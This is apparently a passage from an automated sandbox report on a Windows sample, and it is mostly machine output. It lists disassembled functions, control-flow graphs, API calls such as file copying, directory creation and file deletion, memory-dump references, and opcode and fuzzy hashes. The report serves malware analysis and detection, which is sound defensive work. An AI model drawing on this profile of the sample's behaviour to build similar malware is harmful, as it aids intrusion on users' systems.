9c88b-9c899 24762->24764 24765 9c89f-9c8a6 call 10d0b2 24762->24765 24764->24651 24764->24765 24765->24666
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009C806
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009C81F
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009CB77
                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0009CB90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___std_exception_destroy
                                                                                                                                                                                    • String ID: value
                                                                                                                                                                                    • API String ID: 4194217158-494360628
                                                                                                                                                                                    • Opcode ID: 9e4349e63700bc0e3e3f974c14b3e7454669cd8eec0c531aaf156662d8be6963
                                                                                                                                                                                    • Instruction ID: ebeb2fcc296136e916ba1faaa44faf3036fbb936fd9d3bb3ec52cb3454ce8a7f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4349e63700bc0e3e3f974c14b3e7454669cd8eec0c531aaf156662d8be6963
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9022D371D002488FEF18CFA4C894BEDFBB1AF59300F148299E449A7782DB746A85DF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0003B8E0 Relevance: 4.9, APIs: 3, Instructions: 443COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 25454 3b8e0-3b93d 25455 3b944-3b94f 25454->25455 25455->25455 25456 3b951-3b972 call 112f00 25455->25456 25459 3b974-3b99c call 116cd6 call 112a8b call 116cd6 25456->25459 25460 3b9dd-3b9e4 25456->25460 25477 3b9b1-3b9b8 call 986d0 25459->25477 25478 3b99e-3b9a4 25459->25478 25461 3b9e6-3b9f2 25460->25461 25462 3ba0e-3ba1e 25460->25462 25464 3ba04-3ba0b call 10d0b2 25461->25464 25465 3b9f4-3ba02 25461->25465 25464->25462 25465->25464 25468 3ba1f-3ba6d call 112350 call 99df0 25465->25468 25483 3ba74-3ba7f 25468->25483 25485 3b9bd 25477->25485 25480 3b9a6 25478->25480 25481 3b9a8-3b9af 25478->25481 25480->25481 25484 3b9c0-3b9c6 25481->25484 25483->25483 25486 3ba81-3baa2 call 112f00 25483->25486 25487 3b9ca-3b9cf call 11b77f 25484->25487 25488 3b9c8 25484->25488 25485->25484 25492 3baa4-3bace call 116cd6 call 112a8b call 116cd6 25486->25492 25493 3bb0a-3bb11 25486->25493 25494 3b9d4-3b9da call 116788 25487->25494 25488->25487 25513 3bae0-3bae7 call 986d0 25492->25513 25514 3bad0-3bad4 25492->25514 25496 3bb13-3bb1f 25493->25496 25497 3bb3b-3bb4b 25493->25497 25494->25460 25501 3bb31-3bb38 call 10d0b2 25496->25501 25502 3bb21-3bb2f 25496->25502 25501->25497 25502->25501 25504 3bb4c-3bb9d call 112350 call 99df0 25502->25504 25516 3bba4-3bbaf 25504->25516 25521 3baec-3baf2 25513->25521 25517 3bad6 25514->25517 25518 3bad8-3bade 25514->25518 25516->25516 25520 3bbb1-3bbd2 call 112f00 25516->25520 25517->25518 25518->25521 25528 3bc44-3bc4b 25520->25528 25529 3bbd4-3bc08 call 116cd6 call 112a8b call 116cd6 25520->25529 25523 3baf6-3bafb call 11b77f 25521->25523 25524 3baf4 25521->25524 25527 3bb00-3bb09 call 116788 25523->25527 25524->25523 25527->25493 25532 3bc75-3bc85 25528->25532 25533 3bc4d-3bc59 25528->25533 25549 3bc1a-3bc21 call 986d0 25529->25549 25550 3bc0a-3bc0e 25529->25550 25536 3bc6b-3bc72 call 10d0b2 25533->25536 25537 3bc5b-3bc69 25533->25537 25536->25532 25537->25536 25539 3bc86-3bc9e call 112350 25537->25539 25546 3bca0-3bcab 25539->25546 25546->25546 25548 3bcad-3bcce call 112f00 25546->25548 25559 3bcd0-3bce8 call 116cd6 call 112a8b call 116788 25548->25559 25560 3bceb-3bcf2 25548->25560 25555 3bc26-3bc2c 25549->25555 25552 3bc12-3bc18 25550->25552 25553 3bc10 25550->25553 25552->25555 25553->25552 25557 3bc30-3bc3b call 11b77f call 116788 25555->25557 25558 3bc2e 25555->25558 25575 3bc40-3bc43 25557->25575 25558->25557 25559->25560 25563 3bcf4-3bd00 25560->25563 25564 3bd1c-3bd22 25560->25564 25567 3bd12-3bd19 call 10d0b2 25563->25567 25568 3bd02-3bd10 25563->25568 25567->25564 25568->25567 25572 3bd23-3bd4e call 112350 25568->25572 25582 3bd50-3bd54 25572->25582 25583 3bd5f-3bd64 25572->25583 25575->25528 25582->25583 25584 3bd56-3bd5e 25582->25584
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                    • Opcode ID: 7d588ad2c223fc8c53ad45e6de19e982034d0ac167612d7932b42cc07a6630fc
                                                                                                                                                                                    • Instruction ID: 335ca84187803ac2d812fbeac78e03632f244bd78f228aa0684767b3f8e6dc1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d588ad2c223fc8c53ad45e6de19e982034d0ac167612d7932b42cc07a6630fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2D15970600204ABDB28DF68CC86BAFB7ADEF55704F10062DF5059B6C2DBB5DA81C791
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00044540 Relevance: 4.8, APIs: 3, Instructions: 331fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 25585 44540-4459e 25586 445a5-445aa 25585->25586 25586->25586 25587 445ac-445df call 32830 25586->25587 25590 445e0-445e5 25587->25590 25590->25590 25591 445e7-4465a call 32830 call 3c430 call 3c790 25590->25591 25598 44660-44665 25591->25598 25598->25598 25599 44667-44672 25598->25599 25600 44952 call 32040 25599->25600 25601 44678-4470a call 9d850 call 9d660 call 95b90 25599->25601 25604 44957 call 112350 25600->25604 25615 4470c-44718 25601->25615 25616 44738-44754 25601->25616 25608 4495c-4495d call 10c05c 25604->25608 25612 44962-44967 call 112350 25608->25612 25620 4472e-44735 call 10d0b2 25615->25620 25621 4471a-44728 25615->25621 25617 44785-4478f 25616->25617 25618 44756-44765 25616->25618 25624 44791-4479d 25617->25624 25625 447bd-447e6 CopyFileA 25617->25625 25622 44767-44775 25618->25622 25623 4477b-44782 call 10d0b2 25618->25623 25620->25616 25621->25604 25621->25620 25622->25604 25622->25623 25623->25617 25628 447b3-447ba call 10d0b2 25624->25628 25629 4479f-447ad 25624->25629 25630 4481f-4482e call 10c3b3 25625->25630 25631 447e8-44806 call 3aba0 CopyFileA 25625->25631 25628->25625 25629->25604 25629->25628 25630->25608 25641 44834-44847 call 10a930 25630->25641 25631->25630 25640 44808-44810 call 10a930 25631->25640 25644 44815-4481a 25640->25644 25645 4484c-44874 call 95e10 25641->25645 25646 448f3-448f9 25644->25646 25653 44876-448a0 25645->25653 25654 448a2-448af call a2570 25645->25654 25648 44923-44951 call 98000 25646->25648 25649 448fb-44907 25646->25649 25651 44919-44920 call 10d0b2 25649->25651 25652 44909-44917 25649->25652 25651->25648 25652->25612 25652->25651 25658 448b2-448b5 25653->25658 25654->25658 25660 448e6-448f0 call 10c3c4 25658->25660 25661 448b7-448c6 25658->25661 25660->25646 25664 448dc-448e3 call 10d0b2 25661->25664 25665 448c8-448d6 25661->25665 25664->25660 25665->25612 25665->25664
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 000447DE
                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?), ref: 000447FE
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 000448EB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CopyFile$Mtx_unlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 741997458-0
                                                                                                                                                                                    • Opcode ID: a1a9a5f303d25382628ee6faeb7e3cfd7e2624d67f3ae8756d806c345e8077ce
                                                                                                                                                                                    • Instruction ID: bd1b5aad3cda57572e49505bad881b4757273e55fa79fbfd37c2493c7967a745
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1a9a5f303d25382628ee6faeb7e3cfd7e2624d67f3ae8756d806c345e8077ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6C12671D002089FDF08DFA8CC49BAEB7B5FF55304F24826CE445A7292DB746A85CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 001221C3 Relevance: 3.3, APIs: 2, Instructions: 297COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6dac44fdc66aa8b6e683b0eef20b672912339c7d6b301c27ab44421c4783c223
                                                                                                                                                                                    • Instruction ID: fe3b8a10610651890861c4d5f7f826087cbbd7b148e86718c0f4be766c0697ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dac44fdc66aa8b6e683b0eef20b672912339c7d6b301c27ab44421c4783c223
                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB13770A04269BFDF19EFA8E880BBD7BB1FF69304F544258E5009B291CB749D91CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00044970 Relevance: 3.1, APIs: 2, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1418687624-0
                                                                                                                                                                                    • Opcode ID: 0e068312afd7978e195fb0d25174a2f7459b3d82bbf9151c48ace78f88eaeabd
                                                                                                                                                                                    • Instruction ID: b5dcd1fa2fa83a6f7a686ddefaf8a32990fa0b4c1379b378aa365d0363b8c6ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e068312afd7978e195fb0d25174a2f7459b3d82bbf9151c48ace78f88eaeabd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 893139B2B002049BDB1CDF68DC8576EB762AB90304B08423CF8069B796D776AD91C7D5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0003C010 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 0003C026
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0003C033
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryMtx_unlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3577089425-0
                                                                                                                                                                                    • Opcode ID: 72167f702d19e88a21889aeb7ea90f0657fb4ae7ce3eaa4fe9e1565db947cd62
                                                                                                                                                                                    • Instruction ID: cb28e287b1ed4a002e91ad92ac509ec1220ffef68a47dd9d369b73a10a879384
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72167f702d19e88a21889aeb7ea90f0657fb4ae7ce3eaa4fe9e1565db947cd62
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51D0A7B2E0122013E53433742C0689B200C4A31350F040575BD44DB286FB84DC1042D1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00125309 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,00116991,?), ref: 00125311
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00125322
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile__dosmaperr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1911827773-0
                                                                                                                                                                                    • Opcode ID: 40a4a5ef9f1a264ad7d9d7a35cec03438442383f071c1b0efdcc7c62aea4e46f
                                                                                                                                                                                    • Instruction ID: 2ebcd24bf4c9ccb4631b30902ae3ef9b4eb2509e64b51deeb587e59c2f1aebb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40a4a5ef9f1a264ad7d9d7a35cec03438442383f071c1b0efdcc7c62aea4e46f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD01232186A08659E2535F57C004573B5EDFD17BD3702A21F82CC5590EF22DC528061
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D40AE2 Relevance: 1.8, APIs: 1, Instructions: 301fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234091865-0
                                                                                                                                                                                    • Opcode ID: 06d2dec3493f202e82651b53ed7377181f0d975346246d5b5ac429a48d7e1bd4
                                                                                                                                                                                    • Instruction ID: a77b303168479c5a30584df14e077ccc4591323ba944915012a75b936655e123
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06d2dec3493f202e82651b53ed7377181f0d975346246d5b5ac429a48d7e1bd4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73517CFB20D111BE725385816B10EFB676EE5C6730330C82BFA87C5506F298AE8E6531
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D40B4B Relevance: 1.8, APIs: 1, Instructions: 301COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2562219e71fb081ae2758d08d74f3c18f8eadb2fd6064efcd64385e44386ad62
                                                                                                                                                                                    • Instruction ID: d0d1301cfc0e41fcf663eac9e448e9c31aa32f38693d05046e8239a44f0db6b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2562219e71fb081ae2758d08d74f3c18f8eadb2fd6064efcd64385e44386ad62
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F5170FB20D111BE715385812B14EFB676EE5C6B30331C82BF987C5546F298AE8E6471
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D40B13 Relevance: 1.8, APIs: 1, Instructions: 280fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseDllReadWriteIniFile.KERNEL32(00000031,00000031,00000031,?,?,?,?,04D4095C,?,?,04D40709,?,?,04D40709), ref: 04D40C28
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2741655887.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d40000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseFileReadWrite
